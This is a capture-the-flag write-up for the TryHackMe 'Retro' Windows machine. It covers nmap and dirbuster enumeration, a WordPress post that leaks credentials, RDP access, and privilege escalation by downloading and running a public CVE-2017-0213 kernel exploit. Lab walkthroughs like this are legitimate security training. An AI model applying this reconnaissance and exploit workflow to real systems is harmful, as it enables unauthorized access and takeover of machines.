TryHackMe Retro — Write Up

A Kali Linux 2019–1 image was used to perform the task.

The IP address of the remote machine for my session was 10.10.200.145

Enumeration

After kicking off the session you will note that you cannot ping the machine in question.

Running nmap -Pn -sV 10.10.200.145 against the machine returned the following ports open.

We can clearly see a web server and the rdp port (3389) are open for business.

A web server is running on the target. What is the hidden directory which the website lives on?

Let’s fire up dirbuster and give it a wordlist…

dirbuster

Very quickly we see in the command line and the tool itself that we’ve located the hidden directory.

You can stop the scan as we’ve already answered the first question.

Now lets take a loot at the website itself.

The dirbuster tool would have enlightened us to the fact that its a wordpress installation. However a useful plugin, if you dont have it already, is wappalyzer and I’d recommend installing it for your browser.

Once installed, you’ll see a “w” icon in the browser bar and clicking on it give you this:

We can now see what version of Wordpress the site is running.

Now at this point I did go and install WPScan. WPScan is a wordpress vulnerability scanner. While they recommend to install using gem install wpscan, I chose to clone from the github repo (Even though the dont recommend this for some reason!) and followed the steps on the wpscan site.

What Ill say is that it turned out not to be useful for this walkthrough but I found it interesting to run the tool against the site to see what possible vulnerabilities did exist.

If you look through the site you will see that there’s a user called Wade who seems to be posting. Indeed Wade is the only user to have posted.

Now I’ll admit this wasn’t very intuitive but you’ll notice the following post.

If you click on this post you’ll find something interesting.

Hmmmm….

This site does have a wordpress login but you’d be heading up a dead end with that at this time as it doesnt help. However we did see port 3389 was open so lets go and take a look.

Im using xfreerdp to connect but you can choose to use whatever rdp client works for you.

Low and behold we’re in and right on the desktop we see the user.txt.

The machine is a Windows 2016 server.

Open the file and you’ll have your first flag.

But how do we get the privilege escalation?!

Pretty easy actually. Check out this site

You’ll find a link to an exploit for https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213

On your Kali machine, go and download the zip file for the x64 architecture.

Unzip the executable and start a simple web server using Python

Now on the Windows 2016 server simply browse to your web server and download the executable

The machine may complain about the file and asking if you want to discard it, of course you want to keep it.

Now simply run the executable as the user wade and you’ll be presented with an elevated administrator command prompt. Go and get your root.txt file..

Mission complete.